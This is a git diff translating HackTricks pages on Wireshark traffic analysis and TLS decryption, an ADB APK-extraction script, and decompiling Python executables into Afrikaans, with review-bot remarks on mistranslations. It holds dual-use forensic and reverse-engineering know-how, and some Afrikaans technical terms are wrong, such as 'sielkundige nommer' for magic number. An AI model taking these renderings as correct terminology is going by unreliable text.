* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,183 +1,181 @@
|
|||
# Wireshark tricks
|
||||
# Wireshark-truuks
|
||||
|
||||
## Wireshark tricks
|
||||
## Wireshark-truuks
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
||||
|
||||
</details>
|
||||
|
||||
## Improve your Wireshark skills
|
||||
## Verbeter jou Wireshark-vaardighede
|
||||
|
||||
### Tutorials
|
||||
### Tutoriale
|
||||
|
||||
The following tutorials are amazing to learn some cool basic tricks:
|
||||
Die volgende tutoriale is fantasties om 'n paar koel basiese truuks te leer:
|
||||
|
||||
* [https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/](https://unit42.paloaltonetworks.com/unit42-customizing-wireshark-changing-column-display/)
|
||||
* [https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/](https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/)
|
||||
* [https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/](https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/)
|
||||
* [https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/](https://unit42.paloaltonetworks.com/using-wireshark-exporting-objects-from-a-pcap/)
|
||||
|
||||
### Analysed Information
|
||||
### Geanaliseerde inligting
|
||||
|
||||
**Expert Information**
|
||||
**Ekspertinligting**
|
||||
|
||||
Clicking on _**Analyze** --> **Expert Information**_ you will have an **overview** of what is happening in the packets **analyzed**:
|
||||
Deur te klik op _**Analyze** --> **Expert Information**_ sal jy 'n **oorsig** kry van wat in die geanaliseerde pakkies gebeur:
|
||||
|
||||
![](<../../../.gitbook/assets/image (570).png>)
|
||||
|
||||
**Resolved Addresses**
|
||||
**Opgeloste adresse**
|
||||
|
||||
Under _**Statistics --> Resolved Addresses**_ you can find several **information** that was "**resolved**" by wireshark like port/transport to protocol, MAC to the manufacturer, etc. It is interesting to know what is implicated in the communication.
|
||||
Onder _**Statistics --> Resolved Addresses**_ kan jy verskeie **inligting** vind wat deur Wireshark "**opgelos**" is, soos poort/vervoer na protokol, MAC na die vervaardiger, ens. Dit is interessant om te weet wat betrokke is in die kommunikasie.
|
||||
|
||||
![](<../../../.gitbook/assets/image (571).png>)
|
||||
|
||||
**Protocol Hierarchy**
|
||||
**Protokolhiërargie**
|
||||
|
||||
Under _**Statistics --> Protocol Hierarchy**_ you can find the **protocols** **involved** in the communication and data about them.
|
||||
Onder _**Statistics --> Protocol Hierarchy**_ kan jy die **protokolle** vind wat betrokke is by die kommunikasie en inligting daaroor.
|
||||
|
||||
![](<../../../.gitbook/assets/image (572).png>)
|
||||
|
||||
**Conversations**
|
||||
**Gesprekke**
|
||||
|
||||
Under _**Statistics --> Conversations**_ you can find a **summary of the conversations** in the communication and data about them.
|
||||
Onder _**Statistics --> Conversations**_ kan jy 'n **opsomming van die gesprekke** in die kommunikasie vind en inligting daaroor.
|
||||
|
||||
![](<../../../.gitbook/assets/image (573).png>)
|
||||
|
||||
**Endpoints**
|
||||
**Eindpunte**
|
||||
|
||||
Under _**Statistics --> Endpoints**_ you can find a **summary of the endpoints** in the communication and data about each of them.
|
||||
Onder _**Statistics --> Endpoints**_ kan jy 'n **opsomming van die eindpunte** in die kommunikasie vind en inligting daaroor.
|
||||
|
||||
![](<../../../.gitbook/assets/image (575).png>)
|
||||
|
||||
**DNS info**
|
||||
**DNS-inligting**
|
||||
|
||||
Under _**Statistics --> DNS**_ you can find statistics about the DNS request captured.
|
||||
Onder _**Statistics --> DNS**_ kan jy statistieke oor die vasgevangste DNS-versoek vind.
|
||||
|
||||
![](<../../../.gitbook/assets/image (577).png>)
|
||||
|
||||
**I/O Graph**
|
||||
**I/O-grafiek**
|
||||
|
||||
Under _**Statistics --> I/O Graph**_ you can find a **graph of the communication.**
|
||||
Onder _**Statistics --> I/O Graph**_ kan jy 'n **grafiek van die kommunikasie** vind.
|
||||
|
||||
![](<../../../.gitbook/assets/image (574).png>)
|
||||
|
||||
### Filters
|
||||
### Filtreerders
|
||||
|
||||
Here you can find wireshark filter depending on the protocol: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
|
||||
Other interesting filters:
|
||||
Hier kan jy Wireshark-filtreerders vind, afhangende van die protokol: [https://www.wireshark.org/docs/dfref/](https://www.wireshark.org/docs/dfref/)\
|
||||
Ander interessante filtreerders:
|
||||
|
||||
* `(http.request or ssl.handshake.type == 1) and !(udp.port eq 1900)`
|
||||
* HTTP and initial HTTPS traffic
|
||||
* HTTP- en aanvanklike HTTPS-verkeer
|
||||
* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002) and !(udp.port eq 1900)`
|
||||
* HTTP and initial HTTPS traffic + TCP SYN
|
||||
* HTTP- en aanvanklike HTTPS-verkeer + TCP SYN
|
||||
* `(http.request or ssl.handshake.type == 1 or tcp.flags eq 0x0002 or dns) and !(udp.port eq 1900)`
|
||||
* HTTP and initial HTTPS traffic + TCP SYN + DNS requests
|
||||
* HTTP- en aanvanklike HTTPS-verkeer + TCP SYN + DNS-versoeke
|
||||
|
||||
### Search
|
||||
### Soek
|
||||
|
||||
If you want to **search** for **content** inside the **packets** of the sessions press _CTRL+f_. You can add new layers to the main information bar (No., Time, Source, etc.) by pressing the right button and then the edit column.
|
||||
As jy wil **soek** na **inhoud** binne die **pakkies** van die sessies, druk _CTRL+f_. Jy kan nuwe lae byvoeg tot die hoofinligtingstabel (No., Tyd, Bron, ens.) deur die regterknoppie te druk en dan die kolom te wysig.
|
||||
|
||||
### Free pcap labs
|
||||
### Gratis pcap-laboratoriums
|
||||
|
||||
**Practice with the free challenges of: [https://www.malware-traffic-analysis.net/](https://www.malware-traffic-analysis.net)**
|
||||
**Oefen met die gratis uitdagings van: [https://www.malware-traffic-analysis.net/](https://www.malware-traffic-analysis.net)**
|
||||
|
||||
## Identifying Domains
|
||||
## Identifiseer domeine
|
||||
|
||||
You can add a column that shows the Host HTTP header:
|
||||
Jy kan 'n kolom byvoeg wat die Host HTTP-kop wys:
|
||||
|
||||
![](<../../../.gitbook/assets/image (403).png>)
|
||||
|
||||
And a column that add the Server name from an initiating HTTPS connection (**ssl.handshake.type == 1**):
|
||||
En 'n kolom wat die Bedienernaam byvoeg van 'n inisieerende HTTPS-verbinding (**ssl.handshake.type == 1**):
|
||||
|
||||
![](<../../../.gitbook/assets/image (408) (1).png>)
|
||||
|
||||
## Identifying local hostnames
|
||||
## Identifiseer plaaslike hostnames
|
||||
|
||||
### From DHCP
|
||||
### Vanaf DHCP
|
||||
|
||||
In current Wireshark instead of `bootp` you need to search for `DHCP`
|
||||
In die huidige Wireshark moet jy in plaas van `bootp` soek vir `DHCP`
|
||||
|
||||
![](<../../../.gitbook/assets/image (404).png>)
|
||||
|
||||
### From NBNS
|
||||
### Vanaf NBNS
|
||||
|
||||
![](<../../../.gitbook/assets/image (405).png>)
|
||||
|
||||
## Decrypting TLS
|
||||
## Ontsleutel TLS
|
||||
|
||||
### Decrypting https traffic with server private key
|
||||
### Ontsleutel https-verkeer met bedienerprivaatsleutel
|
||||
|
||||
_edit>preference>protocol>ssl>_
|
||||
|
||||
![](<../../../.gitbook/assets/image (98).png>)
|
||||
|
||||
Press _Edit_ and add all the data of the server and the private key (_IP, Port, Protocol, Key file and password_)
|
||||
Druk _Edit_ en voeg al die data van die bediener en die privaatsleutel by (_IP, Poort, Protokol, Sleutel-lêer en wagwoord_)
|
||||
|
||||
### Decrypting https traffic with symmetric session keys
|
||||
### Ontsleutel https-verkeer met simmetriese sessiesleutels
|
||||
|
||||
Both Firefox and Chrome have the capability to log TLS session keys, which can be used with Wireshark to decrypt TLS traffic. This allows for in-depth analysis of secure communications. More details on how to perform this decryption can be found in a guide at [Red Flag Security](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/).
|
||||
Beide Firefox en Chrome het die vermoë om TLS-sessiesleutels te log, wat met Wireshark gebruik kan word om TLS-verkeer te ontsleutel. Dit maak diepgaande analise van veilige kommunikasie moontlik. Meer besonderhede oor hoe om hierdie ontsleuteling uit te voer, is te vinde in 'n gids by [Red Flag Security](https://redflagsecurity.net/2019/03/10/decrypting-tls-wireshark/).
|
||||
|
||||
To detect this search inside the environment for to variable `SSLKEYLOGFILE`
|
||||
Om dit op te spoor, soek binne die omgewing na die veranderlike `SSLKEYLOGFILE`
|
||||
|
||||
A file of shared keys will look like this:
|
||||
'n Lêer van gedeelde sleutels sal so lyk:
|
||||
|
||||
![](<../../../.gitbook/assets/image (99).png>)
|
||||
|
||||
To import this in wireshark go to \_edit > preference > protocol > ssl > and import it in (Pre)-Master-Secret log filename:
|
||||
Om dit in Wireshark in te voer, gaan na \_edit > preference > protocol > ssl > en voer dit in (Pre)-Master-Secret log filename:
|
||||
|
||||
![](<../../../.gitbook/assets/image (100).png>)
|
||||
|
||||
## ADB communication
|
||||
|
||||
Extract an APK from an ADB communication where the APK was sent:
|
||||
## ADB-kommunikasie
|
||||
|
||||
Onttrek 'n APK uit 'n ADB-kommunikasie waar die APK gestuur is:
|
||||
```python
|
||||
from scapy.all import *
|
||||
|
||||
pcap = rdpcap("final2.pcapng")
|
||||
|
||||
def rm_data(data):
|
||||
splitted = data.split(b"DATA")
|
||||
if len(splitted) == 1:
|
||||
return data
|
||||
else:
|
||||
return splitted[0]+splitted[1][4:]
|
||||
splitted = data.split(b"DATA")
|
||||
if len(splitted) == 1:
|
||||
return data
|
||||
else:
|
||||
return splitted[0]+splitted[1][4:]
|
||||
|
||||
all_bytes = b""
|
||||
for pkt in pcap:
|
||||
if Raw in pkt:
|
||||
a = pkt[Raw]
|
||||
if b"WRTE" == bytes(a)[:4]:
|
||||
all_bytes += rm_data(bytes(a)[24:])
|
||||
else:
|
||||
all_bytes += rm_data(bytes(a))
|
||||
if Raw in pkt:
|
||||
a = pkt[Raw]
|
||||
if b"WRTE" == bytes(a)[:4]:
|
||||
all_bytes += rm_data(bytes(a)[24:])
|
||||
else:
|
||||
all_bytes += rm_data(bytes(a))
|
||||
print(all_bytes)
|
||||
|
||||
f = open('all_bytes.data', 'w+b')
|
||||
f.write(all_bytes)
|
||||
f.close()
|
||||
```
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
|
|
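Review bot: terminology drifts between the translated footers in this commit: this hunk renders "hacking tricks" as "hacking-truuks" and "github repos" as "GitHub-opslagplekke", while the same footer in the .pyc.md file further down uses "hacktruuks" and "github-repos", and one copy writes "NFT's" where the others write "NFTs". The header and footer blocks are shared boilerplate and should be byte-identical across pages; pick one form and apply it everywhere.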
@ -1,89 +1,78 @@
|
|||
# Decompile compiled python binaries (exe, elf) - Retreive from .pyc
|
||||
# Ontkompilering van gekompileerde Python-binêre (exe, elf) - Herwin vanaf .pyc
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking vanaf nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
<img src="../../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
|
||||
|
||||
If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
|
||||
As jy belangstel in 'n **hackingsloopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vloeiende skriftelike en mondelinge Pools vereis_).
|
||||
|
||||
{% embed url="https://www.stmcyber.com/careers" %}
|
||||
|
||||
## From Compiled Binary to .pyc
|
||||
|
||||
From an **ELF** compiled binary you can **get the .pyc** with:
|
||||
## Vanaf Gekompileerde Binêre na .pyc
|
||||
|
||||
Vanaf 'n **ELF** gekompileerde binêre kan jy die **.pyc** kry met:
|
||||
```bash
|
||||
pyi-archive_viewer <binary>
|
||||
# The list of python modules will be given here:
|
||||
[(0, 230, 311, 1, 'm', 'struct'),
|
||||
(230, 1061, 1792, 1, 'm', 'pyimod01_os_path'),
|
||||
(1291, 4071, 8907, 1, 'm', 'pyimod02_archive'),
|
||||
(5362, 5609, 13152, 1, 'm', 'pyimod03_importers'),
|
||||
(10971, 1473, 3468, 1, 'm', 'pyimod04_ctypes'),
|
||||
(12444, 816, 1372, 1, 's', 'pyiboot01_bootstrap'),
|
||||
(13260, 696, 1053, 1, 's', 'pyi_rth_pkgutil'),
|
||||
(13956, 1134, 2075, 1, 's', 'pyi_rth_multiprocessing'),
|
||||
(15090, 445, 672, 1, 's', 'pyi_rth_inspect'),
|
||||
(15535, 2514, 4421, 1, 's', 'binary_name'),
|
||||
(230, 1061, 1792, 1, 'm', 'pyimod01_os_path'),
|
||||
(1291, 4071, 8907, 1, 'm', 'pyimod02_archive'),
|
||||
(5362, 5609, 13152, 1, 'm', 'pyimod03_importers'),
|
||||
(10971, 1473, 3468, 1, 'm', 'pyimod04_ctypes'),
|
||||
(12444, 816, 1372, 1, 's', 'pyiboot01_bootstrap'),
|
||||
(13260, 696, 1053, 1, 's', 'pyi_rth_pkgutil'),
|
||||
(13956, 1134, 2075, 1, 's', 'pyi_rth_multiprocessing'),
|
||||
(15090, 445, 672, 1, 's', 'pyi_rth_inspect'),
|
||||
(15535, 2514, 4421, 1, 's', 'binary_name'),
|
||||
...
|
||||
|
||||
? X binary_name
|
||||
to filename? /tmp/binary.pyc
|
||||
```
|
||||
|
||||
In a **python exe binary** compiled you can **get the .pyc** by running:
|
||||
|
||||
In 'n **python exe binêre** wat gekompileer is, kan jy die .pyc kry deur die volgende uit te voer:
|
||||
```bash
|
||||
python pyinstxtractor.py executable.exe
|
||||
```
|
||||
## Van .pyc na Python-kode
|
||||
|
||||
## From .pyc to python code
|
||||
|
||||
For the **.pyc** data ("compiled" python) you should start trying to **extract** the **original** **python** **code**:
|
||||
|
||||
Vir die **.pyc**-data ("gekompileerde" Python) moet jy begin om te probeer om die **oorspronklike** **Python**-kode te **onttrek**:
|
||||
```bash
|
||||
uncompyle6 binary.pyc > decompiled.py
|
||||
```
|
||||
**Maak seker** dat die binêre lêer die **uitbreiding** "**.pyc**" het (as dit nie die geval is nie, sal uncompyle6 nie werk nie)
|
||||
|
||||
**Be sure** that the binary has the **extension** "**.pyc**" (if not, uncompyle6 is not going to work)
|
||||
|
||||
While executing **uncompyle6** you might find the **following errors**:
|
||||
|
||||
### Error: Unknown magic number 227
|
||||
Terwyl jy **uncompyle6** uitvoer, mag jy die **volgende foute** teëkom:
|
||||
|
||||
### Fout: Onbekende magiese nommer 227
|
||||
```bash
|
||||
/kali/.local/bin/uncompyle6 /tmp/binary.pyc
|
||||
Unknown magic number 227 in /tmp/binary.pyc
|
||||
```
|
||||
Om dit reg te stel, moet jy die korrekte "magic number" by die begin van die gegenereerde lêer voeg.
|
||||
|
||||
To fix this you need to **add the correct magic number** at the beginning of the generated file.
|
||||
|
||||
**Magic numbers vary with the python version**, to get the magic number of **python 3.8** you will need to **open a python 3.8** terminal and execute:
|
||||
|
||||
"Magic numbers" verskil met die Python-weergawe, om die "magic number" van Python 3.8 te kry, moet jy 'n Python 3.8-terminal oopmaak en die volgende uitvoer:
|
||||
```
|
||||
>> import imp
|
||||
>> imp.get_magic().hex()
|
||||
'550d0d0a'
|
||||
```
|
||||
Die **sielkundige nommer** in hierdie geval vir python3.8 is **`0x550d0d0a`**, dan, om hierdie fout reg te stel, sal jy nodig hê om dit by die **begin** van die **.pyc-lêer** die volgende bytes by te voeg: `0x0d550a0d000000000000000000000000`
|
||||
|
||||
The **magic number** in this case for python3.8 is **`0x550d0d0a`**, then, to fix this error you will need to **add** at the **beginning** of the **.pyc file** the following bytes: `0x0d550a0d000000000000000000000000`
|
||||
|
||||
**Once** you have **added** that magic header, the **error should be fixed.**
|
||||
|
||||
This is how a correctly added **.pyc python3.8 magic header** will look like:
|
||||
**Sodra** jy daardie sielkundige kop bygevoeg het, behoort die **fout reggestel te wees.**
|
||||
|
||||
So lyk 'n korrek bygevoegde **.pyc python3.8 sielkundige kop**:
|
||||
```bash
|
||||
hexdump 'binary.pyc' | head
|
||||
0000000 0d55 0a0d 0000 0000 0000 0000 0000 0000
|
||||
|
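Review bot: "magic number" is mistranslated as "sielkundige nommer" (psychological number) at the lines starting "Die **sielkundige nommer** in hierdie geval vir python3.8", "**Sodra** jy daardie sielkundige kop bygevoeg het" and "So lyk 'n korrek bygevoegde **.pyc python3.8 sielkundige kop**", while the heading in the same hunk already uses "Onbekende magiese nommer 227" and the paragraph below it keeps the quoted English "magic number"; use "magiese nommer" / "magiese kop" consistently. "ons is aan die werf" in the STM Cyber banner reads as "we are at the shipyard"; the verb form "ons werf!" is what "we are hiring" needs. The translated line "In 'n **python exe binêre** wat gekompileer is, kan jy die .pyc kry" also drops the bold on ".pyc" that the English line carries, and "Decompiling" in the later heading "Fout: Decompiling generiese foute" is left untranslated.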
@ -91,28 +80,26 @@ hexdump 'binary.pyc' | head
|
|||
0000020 0700 0000 4000 0000 7300 0132 0000 0064
|
||||
0000030 0164 006c 005a 0064 0164 016c 015a 0064
|
||||
```
|
||||
### Fout: Decompiling generiese foute
|
||||
|
||||
### Error: Decompiling generic errors
|
||||
**Ander foute** soos: `class 'AssertionError'>; co_code should be one of the types (<class 'str'>, <class 'bytes'>, <class 'list'>, <class 'tuple'>); is type <class 'NoneType'>` kan voorkom.
|
||||
|
||||
**Other errors** like: `class 'AssertionError'>; co_code should be one of the types (<class 'str'>, <class 'bytes'>, <class 'list'>, <class 'tuple'>); is type <class 'NoneType'>` may appear.
|
||||
Dit beteken waarskynlik dat jy die **sielkundige nommer nie korrek bygevoeg het nie** of dat jy nie die **korrekte sielkundige nommer gebruik het nie**, so maak **seker dat jy die korrekte een gebruik** (of probeer 'n nuwe een).
|
||||
|
||||
This probably means that you **haven't added correctly** the magic number or that you haven't **used** the **correct magic number**, so make **sure you use the correct one** (or try a new one).
|
||||
Kyk na die vorige foutdokumentasie.
|
||||
|
||||
Check the previous error documentation.
|
||||
## Outomatiese hulpmiddel
|
||||
|
||||
## Automatic Tool
|
||||
Die **[python-exe-unpacker-hulpmiddel](https://github.com/countercept/python-exe-unpacker)** dien as 'n kombinasie van verskeie gemeenskapsbeskikbare hulpmiddels wat ontleders help om uitvoerbare lêers wat in Python geskryf is, te ontleed en te dekompilieer, spesifiek dié wat met py2exe en pyinstaller geskep is. Dit sluit YARA-reëls in om te identifiseer of 'n uitvoerbare lêer op Python gebaseer is en bevestig die skeppingstool.
|
||||
|
||||
The **[python-exe-unpacker tool](https://github.com/countercept/python-exe-unpacker)** serves as a combination of several community-available tools designed to assist researchers in unpacking and decompiling executables written in Python, specifically those created with py2exe and pyinstaller. It includes YARA rules to identify if an executable is Python-based and confirms the creation tool.
|
||||
### ImportError: Lêernaam: 'unpacked/malware\_3.exe/**pycache**/archive.cpython-35.pyc' bestaan nie
|
||||
|
||||
### ImportError: File name: 'unpacked/malware\_3.exe/**pycache**/archive.cpython-35.pyc' doesn't exist
|
||||
|
||||
A common issue encountered involves an incomplete Python bytecode file resulting from the **unpacking process with unpy2exe or pyinstxtractor**, which then **fails to be recognized by uncompyle6 due to a missing Python bytecode version number**. To address this, a prepend option has been added, which appends the necessary Python bytecode version number, facilitating the decompiling process.
|
||||
|
||||
Example of the issue:
|
||||
'n Algemene probleem wat ondervind word, behels 'n onvolledige Python-sielkode-lêer as gevolg van die **ontpakkingsproses met unpy2exe of pyinstxtractor**, wat dan **nie deur uncompyle6 erken word nie as gevolg van 'n ontbrekende Python-sielkode-weergawe-nommer**. Om dit aan te spreek, is 'n voorvoegselopsie bygevoeg wat die nodige Python-sielkode-weergawe-nommer byvoeg en die dekompilasieproses vergemaklik.
|
||||
|
||||
Voorbeeld van die probleem:
|
||||
```python
|
||||
# Error when attempting to decompile without the prepend option
|
||||
test@test: uncompyle6 unpacked/malware_3.exe/archive.py
|
||||
test@test: uncompyle6 unpacked/malware_3.exe/archive.py
|
||||
Traceback (most recent call last):
|
||||
...
|
||||
ImportError: File name: 'unpacked/malware_3.exe/__pycache__/archive.cpython-35.pyc' doesn't exist
|
||||
|
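Review bot: "Python bytecode" is rendered as "Python-sielkode" in the paragraph starting "'n Algemene probleem wat ondervind word"; the term is "bytekode", and "sielkundige nommer" in "Dit beteken waarskynlik dat jy die **sielkundige nommer nie korrek bygevoeg het nie**" should likewise be "magiese nommer". "dekompilieer" in the python-exe-unpacker paragraph is a typo for "dekompileer". Independently of the translation, the heading "ImportError: File name: 'unpacked/malware\_3.exe/**pycache**/archive.cpython-35.pyc' doesn't exist" loses the double underscores of `__pycache__` to Markdown bold in both the removed and the added line; wrapping the path in backticks, as the traceback below it shows the intended `__pycache__`, would fix it in both languages.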
@ -127,11 +114,9 @@ test@test:python python_exe_unpack.py -p unpacked/malware_3.exe/archive
|
|||
# Successfully decompiled file
|
||||
[+] Successfully decompiled.
|
||||
```
|
||||
## Analiseer Python-samestelling
|
||||
|
||||
## Analyzing python assembly
|
||||
|
||||
If you weren't able to extract the python "original" code following the previous steps, then you can try to **extract** the **assembly** (but i**t isn't very descriptive**, so **try** to extract **again** the original code).In [here](https://bits.theorem.co/protecting-a-python-codebase/) I found a very simple code to **disassemble** the _.pyc_ binary (good luck understanding the code flow). If the _.pyc_ is from python2, use python2:
|
||||
|
||||
As jy nie in staat was om die oorspronklike Python-kode te onttrek nie volgens die vorige stappe, kan jy probeer om die samestelling te onttrek (maar dit is nie baie beskrywend nie, so probeer weer om die oorspronklike kode te onttrek). Ek het 'n baie eenvoudige kode gevind om die _.pyc_ binêre kode te ontbind (sterkte met die verstaan van die kodevloei) [hier](https://bits.theorem.co/protecting-a-python-codebase/). As die _.pyc_ van Python2 afkomstig is, gebruik Python2:
|
||||
```bash
|
||||
>>> import dis
|
||||
>>> import marshal
|
||||
|
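Review bot: the negation in "As jy nie in staat was om die oorspronklike Python-kode te onttrek nie volgens die vorige stappe" is misplaced; the closing "nie" belongs at the end of the clause ("... volgens die vorige stappe te onttrek nie"). The translated paragraph also drops all of the bold the English line puts on "extract", "assembly" and "try again" and the italics on _.pyc_ in the first sentence, so the warning that the disassembly "isn't very descriptive" loses its emphasis; keep the source line's formatting when translating.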
@ -157,34 +142,32 @@ True
|
|||
>>>
|
||||
>>> # Disassemble the code object
|
||||
>>> dis.disassemble(code)
|
||||
